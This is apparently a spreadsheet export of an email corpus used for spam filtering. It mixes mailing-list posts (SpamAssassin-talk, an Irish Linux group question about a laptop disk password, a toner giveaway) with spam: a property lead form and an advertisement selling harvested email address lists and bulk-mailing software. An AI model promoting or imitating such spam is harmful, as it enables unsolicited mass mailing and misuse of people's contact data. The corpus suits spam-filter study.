               &lt;OPTION&gt;No&lt;/OPTION&gt; &lt;OPTION&gt;Don`t care&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;A property in the 
             country&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT type=3Dcheckbox 
             value=3DON name=3DC1&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 13pt; FONT-FAMILY: Arial"&gt;A Property in or near a 
             city&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT type=3Dcheckbox 
             value=3DON name=3DC2&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Pool Yes, 
             No&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT size=3D1 
             name=3DPool&gt; &lt;OPTION selected&gt;Yes&lt;/OPTION&gt; &lt;OPTION&gt;No&lt;/OPTION&gt; 
               &lt;OPTION&gt;Don`t care&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Price 
             Range&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;!--webbot bot=3D"Validation" s-data-type=3D"Number" s-number-separators=3D".," --&gt;&lt;INPUT 
             name=3DPrice_range&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Are you planning to come 
             &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;to Spain in the next three 
             months Yes, No?&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT size=3D1 
             name=3DPlaning_to_come_over&gt; &lt;OPTION selected&gt;Yes&lt;/OPTION&gt; 
               &lt;OPTION&gt;No&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Name&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT 
           name=3DName&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;E mail 
             address&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT 
           name=3Demail&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Telephone 
             Number&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT 
             name=3Dtelephone&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             style=3D"FONT-SIZE: 13pt" face=3DArial&gt;Country Code&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;!--webbot bot=3D"Validation" s-data-type=3D"Integer" s-number-separators=3D"x" --&gt;&lt;INPUT 
             size=3D4 name=3Dcountry_code&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P 
         style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=3Dcenter&gt;&lt;INPUT type=3Dsubmit value=3D"Please click here to proceed &gt;&gt;" name=3DB1&gt;&lt;INPUT type=3Dreset value=3DReset name=3DB2&gt;&lt;/P&gt;&lt;/FORM&gt;
       &lt;H1 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D52 
       src=3D"http://www.secure-siteserver.com/flyer/logo-copy.jpg" width=3D425 
       border=3D0&gt;&lt;/H1&gt;
       &lt;H2 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 15pt"&gt;Let us find a property for 
     you!&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/H2&gt;&lt;/TD&gt;
     &lt;TD width=3D"23%" height=3D36&gt;
       &lt;TABLE id=3DAutoNumber6 style=3D"BORDER-COLLAPSE: collapse" 
       borderColor=3D#111111 height=3D8 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" 
       border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD bgColor=3D#0066cc height=3D8&gt;
             &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D509 
       src=3D"http://www.secure-siteserver.com/flyer/vertical_pic.jpg" width=3D170 
       border=3D0&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D509 
       src=3D"http://www.secure-siteserver.com/flyer/vertical_pic.jpg" width=3D170 
       border=3D0&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D509 
       src=3D"http://www.secure-siteserver.com/flyer/vertical_pic.jpg" width=3D170 
       border=3D0&gt;&lt;/P&gt;
       &lt;TABLE id=3DAutoNumber7 style=3D"BORDER-COLLAPSE: collapse" 
       borderColor=3D#111111 height=3D97 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" 
       border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=3D"100%" bgColor=3D#0066cc 
     height=3D97&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
     &lt;TD width=3D"2%" bgColor=3D#0066cc height=3D36&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"3%" bgColor=3D#0066cc height=3D19&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=3D"74%" bgColor=3D#0066cc height=3D19&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=3D"23%" bgColor=3D#0066cc height=3D19&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=3D"2%" bgColor=3D#0066cc height=3D19&gt;
       &lt;P 
 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------_NextPart_4488214905--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Well if you're talking about epiphany, which is in January, then yes it is
 5 months.Some people do celebrate Christmas on january 6th, or even the 13th.
 But I am certain that what you are thinking is the correct thought.
 Please don't flame me. Just trying to be humerous =)
 Matt Kettler said:
 &gt; On an unrelated, but similarly amusing note, a spam I received (and was
 &gt;  tagged by SA) today began with:
 &gt;
 &gt;
 &gt; &gt; I bet you haven't even realized that Christmas is just 5 months away,
 &gt; &gt;
 &gt; did you?
 &gt;
 &gt;
 &gt; Strangely, no I wasn't aware that Christmas was 5 months away. Here in
 &gt; the  US Christmas is a bit less than 4 months away. Where exactly is
 &gt; the  "international month line" anyway? I've never seen the -74400
 &gt; timezone  before, but I bet it qualifies as INVALID_DATE_TZ_ABSURD :)
 &gt;
 &gt;
 &gt;
 &gt;
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: Jabber - The world's fastest growing
 &gt;  real-time communications platform! Don't just IM. Build it in!
 &gt; http://www.jabber.com/osdn/xim
 &gt; _______________________________________________
 &gt; Spamassassin-talk mailing list
 &gt; Spamassassin-talk@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/spamassassin-talk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</si>
  <si>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[IIU] Printer cartiridges looking for a good home.
</t>
  </si>
  <si>
    <t xml:space="preserve">howdy all,
 I have in my possession the following:
 2/3     Apple toner cartridges    M20 45G/A for laser writer 300 / 320 /
 and 4/600 PS
 1     Apple toner cartridge     M2473G/A  for laser writer 16/600PS /
 pro 630 / pro 600
 1     Cannon EP-A cartridge
 1     Cannon EP-E cartridge
 (the numbers might be a little less)
 Does anyone have one of these printers? Does anyone want to give me the 
 change in their pockets, or the price of a pint for them?
 They would make a great Christmas present!
 If so you can call the printer cartridge hotline on the number below.
 If lines are busy call later. But do call NOW!
 Bernard "I should be a host on QVC" Tyers
 -- 
 Bernard Tyers * National Centre for Sensor Research * P:353-1-700-5273 *
 E: bernard.tyers@dcu.ie * W: www.physics.dcu.ie/~bty * L:N117
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Anyone know how I could remove a HDD password from an Acer Travelmate 201T?
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 David Crozier wrote:
 | Hi folks,
 |
 | I have just taken delivery of three Acer Travelmate laptops from a project
 | we funded which has now ended.  Problem is there are HDD passwords on them
 | which I don't have.  How could I overwrite these?? Any ideas?  I have
 | limited technical and monetry resources here in the new job so can't be
 | buying new HDDs for them.
 |
 | Any Ideas?
 |
 | Dave
 |
 | www.davidcrozier.co.uk
 |
 Google returns about 1500 hits for the search
 "remove acer hard drive password"
 Perhaps one of those might help.
 Here, I'll even quote the search URL:
 http://www.google.com/search?q=remove%20acer%20hard%20drive%20password&amp;sourceid=mozilla-xul
 Waider.
 - --
 waider@waider.ie / Yes, it /is/ very personal of me
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
 iD8DBQE9U53aUXuYo0fJk9MRAhhuAKD9o7vvkLNDcxK4cgMzXLC5HWgc1QCg8afN
 UBbeKiDH1hBgCxY5+y1Wmes=
 =ZdI+
 -----END PGP SIGNATURE-----
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Promote Your Business
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=gb2312"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;Email Marketing&lt;/title&gt;
 &lt;style&gt;
 &lt;!--
 			span.bug { color: black; font-size: 9px; line-height: 9px; font-family: Arial, Helvetica, sans-serif }--&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="0" cellspacing="1" width="730"&gt;
     &lt;tr&gt;
       &lt;td&gt;  
 &lt;div&gt;  
 &lt;font face="Arial" color="#0000FF"&gt;&lt;u&gt;The power of Email Marketing&lt;/u&gt;&lt;/font&gt; 
 &lt;p&gt;&lt;br&gt;
 &lt;/p&gt; 
 &lt;p&gt;   
 &lt;/div&gt;   
 &lt;div&gt;   
   &lt;font face="Arial" size="3"&gt;Email Marketing is spreading&amp;nbsp;around the whole&amp;nbsp;world                   
   because of its&amp;nbsp;high effectiveness,&amp;nbsp;&lt;br&gt;                 
   speed&amp;nbsp;and&amp;nbsp;low cost.&lt;/font&gt;                  
 &lt;/div&gt;                  
 &lt;font face="Arial" size="3"&gt;                  
 &lt;div&gt;                  
   &lt;br&gt;                  
   Now if you want to introduce and sell your product or service,&amp;nbsp;look for                   
   a&amp;nbsp;partner to&amp;nbsp;raise &lt;br&gt;                  
   your website's reputation. The best way would be for you&amp;nbsp;to&amp;nbsp;use&amp;nbsp;email                   
   to contact your&lt;br&gt;        
   targeted customer (of course,first,&amp;nbsp;you&amp;nbsp;have to&amp;nbsp;know their email addresses). &lt;br&gt;                 
 &lt;/font&gt;                 
 &lt;br&gt;                
 &lt;/div&gt;                
 &lt;div&gt;                
   &lt;font face="Arial" size="3"&gt;Targeted Email is no doubt very&amp;nbsp; effective.&amp;nbsp;                   
   If you can introduce your product or service&amp;nbsp;&lt;br&gt;                  
   through&amp;nbsp;email directly to the customers&amp;nbsp;who are interested&amp;nbsp;in                   
   them,&amp;nbsp;&amp;nbsp; this will&amp;nbsp; bring&amp;nbsp;your&amp;nbsp;&lt;br&gt;                 
   business&amp;nbsp;a&amp;nbsp;better chance&amp;nbsp;of success.&amp;nbsp;&lt;/font&gt;                  
 &lt;/div&gt;                  
 &lt;p&gt;&lt;font face="Arial" size="3"&gt;Xin.Lan&amp;nbsp; Internet&amp;nbsp; Marketing&amp;nbsp;                   
 Center,&amp;nbsp; has&amp;nbsp; many years of&amp;nbsp;experience in developing&amp;nbsp;and&amp;nbsp;&lt;br&gt;                  
 utilizing&amp;nbsp;internet resources.We have set&amp;nbsp;up&amp;nbsp;global&amp;nbsp; business&amp;nbsp;                   
 email-address&amp;nbsp;databases&amp;nbsp; &lt;br&gt;                  
 which&amp;nbsp;contain &amp;nbsp;millions&amp;nbsp;of email addresses of commercial&amp;nbsp;                   
 enterprises&amp;nbsp; and consumers&amp;nbsp;&lt;br&gt;                  
 all over the world. These&amp;nbsp;emails are sorted by&amp;nbsp;countries&amp;nbsp;                   
 and&amp;nbsp; fields. We&amp;nbsp;also continuo-&lt;br&gt;                  
 usly&amp;nbsp; update &amp;nbsp;our&amp;nbsp; databases,&amp;nbsp;&amp;nbsp; add&amp;nbsp; new&amp;nbsp;                   
 addresses&amp;nbsp; and&amp;nbsp;&amp;nbsp; remove &amp;nbsp;undeliverable&amp;nbsp; and&amp;nbsp;&lt;br&gt;                  
 unsubscribed addresses.&lt;/font&gt;&lt;/p&gt;                  
 &lt;p&gt;&lt;font face="Arial" size="3"&gt;With the co-operation with our partners,&amp;nbsp; we                   
 can supply&amp;nbsp;valid targeted email&amp;nbsp;addresses&amp;nbsp;&lt;br&gt;                  
 according &amp;nbsp;to&amp;nbsp; your&amp;nbsp; requirements,&amp;nbsp; by&amp;nbsp; which&amp;nbsp; you&amp;nbsp;can&amp;nbsp;                   
 easily&amp;nbsp; and &amp;nbsp;directly &amp;nbsp;contact&amp;nbsp;your&amp;nbsp;&lt;br&gt;                  
 potential&amp;nbsp;customers.With our help many enterprises and individuals&amp;nbsp;have&amp;nbsp;greatly                   
 raised &lt;br&gt;                  
 the&amp;nbsp;fame of their&amp;nbsp;products or service and found many potential                   
 customers.&lt;br&gt;                  
 &lt;br&gt;                  
 We also supply&amp;nbsp;a&amp;nbsp; wide variety&amp;nbsp;of software.&amp;nbsp; For example,                   
 Wcast,&amp;nbsp; the software for&amp;nbsp;fast-&lt;br&gt;                  
 sending emails:&lt;font color="#000000"&gt;this software is a powerful&amp;nbsp;                   
 Internet&amp;nbsp; email-marketing&amp;nbsp; application&amp;nbsp; which &lt;br&gt;                  
 is perfect for individuals or businesses to send&amp;nbsp;multiple customized                   
 email messages to &lt;br&gt;                 
 their customers.&lt;/font&gt;&lt;br&gt;                  
 &lt;br&gt;                  
 We are pleased to&amp;nbsp;offer you&amp;nbsp;our best prices :&lt;/font&gt;&lt;/p&gt;                  
 &lt;div align="left"&gt;                  
   &lt;table height="103" width="608" border="1"&gt;                  
     &lt;tbody&gt;                  
       &lt;tr&gt;                  
         &lt;td width="200" height="17"&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                   
           Emails&amp;nbsp; or&amp;nbsp; Software&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;                  
         &lt;td width="332" height="17"&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                   
           Remarks&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;                  
         &lt;td width="64" height="17"&gt;&lt;b&gt;&lt;font face="Arial" color="#000000" size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;                   
           Price&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;                  
       &lt;/tr&gt;                  
       &lt;tr&gt;                  
         &lt;td width="200" height="94"&gt;&lt;font face="Arial" size="2"&gt;30,000 targeted                   
           email addresses&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                  
         &lt;td width="332" height="94"&gt;&lt;font face="Arial"&gt;&lt;br&gt;                  
           &lt;font size="2"&gt;We are able to supply valid targeted email addresses                   
           according to your requirements,&amp;nbsp; which are compiled&lt;br&gt;  
           only on your order,                   
           such as region / country / field / occupation / Domain Name (such as AOL.com or&lt;br&gt;   
           MSN.com) etc.&lt;br&gt;                  
           &lt;/font&gt;&lt;/font&gt;&lt;/td&gt;                  
         &lt;td width="64" height="115"&gt;&lt;font face="Arial" color="#000000" size="1"&gt;&amp;nbsp;                   
           USD 30.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                  
       &lt;/tr&gt;                  
       &lt;tr&gt;                  
         &lt;td width="200" height="15"&gt;&lt;font face="Arial" color="#000000" size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                   
           Classified email addresses&lt;/font&gt;&lt;/td&gt;                  
         &lt;td width="332" height="15"&gt;&lt;font face="Arial" color="#000000" size="2"&gt;&lt;br&gt;                  
           Our database contains more than 1600 sorts of email addresses,and can                   
           meet&amp;nbsp;your most&amp;nbsp;stringent demands.&lt;br&gt;            
           &lt;br&gt;               
  &lt;/font&gt;&lt;/td&gt;               
         &lt;td width="64" height="19"&gt;&lt;font face="Arial" color="#000000" size="1"&gt;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;               
       &lt;/tr&gt;               
       &lt;tr&gt;               
         &lt;td width="200" height="6"&gt;&lt;font face="Arial" size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;                 
           8 million email addresses&lt;/font&gt;&lt;/td&gt;                
         &lt;td width="332" height="6"&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;                
           8 million email addresses of global commercial enterprise&lt;br&gt;              
           &lt;br&gt;                
           &lt;/font&gt;&lt;/td&gt;               
         &lt;td width="64" height="6"&gt;&lt;font face="Arial" color="#000000" size="1"&gt;&amp;nbsp;USD                 
           240.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                
       &lt;/tr&gt;                
       &lt;tr&gt;                
         &lt;td width="200" height="4"&gt;&lt;font face="Arial" size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                 
           Wcast software&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                
         &lt;td width="332" height="4"&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;                
           Software for fast-sending emails. This program can &lt;br&gt;                
         send mail&amp;nbsp;at a rate of over 10,000 emails per hour, &lt;br&gt;                
         and release information&amp;nbsp;to                 
           thousands of people in a &lt;br&gt;                
         short time.&lt;br&gt;             
           &lt;br&gt;               
           &lt;/font&gt;&lt;/td&gt;              
         &lt;td width="64" height="4"&gt;&lt;font face="Arial" color="#000000" size="1"&gt;&amp;nbsp;                 
           USD 39.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                
       &lt;/tr&gt;                
       &lt;tr&gt;                
         &lt;td width="200" height="47"&gt;&lt;font face="Arial" size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                 
           Email searcher software&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                
         &lt;td width="332" height="47"&gt;&lt;font face="Arial" size="2"&gt;Software for                 
           searching for targeted email addresses.&lt;br&gt;                
           &lt;/font&gt;&lt;/td&gt;                
         &lt;td width="64" height="47"&gt;&lt;font face="Arial" color="#000000" size="1"&gt;&amp;nbsp;                 
           USD 98.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                
       &lt;/tr&gt;                
       &lt;tr&gt;                
         &lt;td width="200" height="11"&gt;&lt;font face="Arial"&gt;&lt;b&gt;&lt;font color="#000000" size="3"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                 
           &lt;/font&gt;&lt;/b&gt;&lt;font color="#000000" size="2"&gt;Global Trade Poster&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;                
         &lt;td width="332" height="11"&gt;&lt;font size="2" face="Arial"&gt;&lt;br&gt;                
           Spread information about your business and your products to over 1500                 
           trade message boards and newsgroups.&lt;br&gt;              
           &lt;br&gt;                
           &lt;/font&gt;&lt;/td&gt;               
         &lt;td width="64" height="11"&gt;&lt;font face="Arial" color="#000000" size="1"&gt;&amp;nbsp;USD                 
           135.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                
       &lt;/tr&gt;                
       &lt;tr&gt;                
         &lt;td width="200" height="10"&gt;&lt;font face="Arial" size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                 
           Jet-Hits Plus 2000 Pro&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                
         &lt;td width="332" height="10"&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;                
           Software for submitting website to 8000+&amp;nbsp; search engines.&lt;br&gt;              
           &lt;br&gt;                
           &lt;/font&gt;&lt;/td&gt;               
         &lt;td width="64" height="10"&gt;&lt;font face="Arial" color="#000000" size="1"&gt;&amp;nbsp;                
           USD 79.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;               
       &lt;/tr&gt;               
     &lt;/tbody&gt;               
   &lt;/table&gt;               
 &lt;/div&gt;               
 &lt;font face="Arial"&gt;               
 &lt;p&gt;&lt;br&gt;               
 You may&amp;nbsp;order the email lists&amp;nbsp;or&amp;nbsp;software directly from our                
 website. &lt;font color="#000000" size="3"&gt;For&amp;nbsp; further details, &lt;br&gt;               
 please&amp;nbsp;refer to our website&lt;/font&gt;&lt;font size="3"&gt;.&lt;/font&gt;&lt;font color="#000000" size="3"&gt;&lt;br&gt;               
 &lt;br&gt;               
 We will be&amp;nbsp; honoured&amp;nbsp; if you are interested&amp;nbsp; in our services or                
 software. &lt;/font&gt;Please do not &lt;br&gt;               
 hesitate to contact us&amp;nbsp;with any queries or concern you may have.&amp;nbsp; We&amp;nbsp;will                
 be&amp;nbsp;happy to&amp;nbsp;&lt;br&gt;               
 serve you.&lt;br&gt;               
 &lt;br&gt;               
 &lt;br&gt;               
 Best regards!&lt;br&gt;               
 &lt;br&gt;               
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                
 &amp;nbsp;&lt;font size="3"&gt;Kang Peng&lt;br&gt;              
 Marketing Manager&lt;/font&gt;&lt;/font&gt;&lt;br&gt; 
 &lt;font face="Arial"&gt;&lt;a href="Http://www.como-verder.com"&gt;Http://www.como-verder.com&lt;/a&gt;&lt;br&gt;
 &lt;a href="mailto:sales@marketing-promote.com"&gt;Sales@marketing-promote.com&lt;/a&gt;&lt;/font&gt;&lt;font face="Arial"&gt;&lt;br&gt;         
 Xin.Lan Internet Marketing Center&lt;/font&gt;&lt;/p&gt;           
 &lt;hr&gt;           
 &lt;p&gt;&lt;font size="2" face="Arial"&gt;You are receiving this email because you               
 registered to receive special offers from one of our marketing&amp;nbsp;&lt;br&gt;              
 partners.If you would prefer not to receive future emails, &lt;font color="#000000"&gt;&amp;nbsp;please               
 click here to&amp;nbsp; &lt;a href="http://unsubscribe-mail.com/index.html?clientid=15"&gt;unsubscribe&lt;/a&gt;               
 , or &lt;/font&gt;&lt;/font&gt;&lt;span class="bug"&gt;&lt;font size="2"&gt;send a &lt;br&gt;              
 blank e-mail to&amp;nbsp; &lt;font color="#0000FF"&gt;&lt;a href="mailto:Emaildata@88998.com"&gt;Emaildata@88998.com&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;        
 &lt;hr&gt;        
       &lt;/td&gt;   
     &lt;/tr&gt;   
   &lt;/table&gt;   
   &lt;/center&gt;   
 &lt;/div&gt;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</si>
  <si>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CBS News' interview w/Bush &amp; reconstruction of his peregrinations
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "60 Minutes II" Bush Interview:
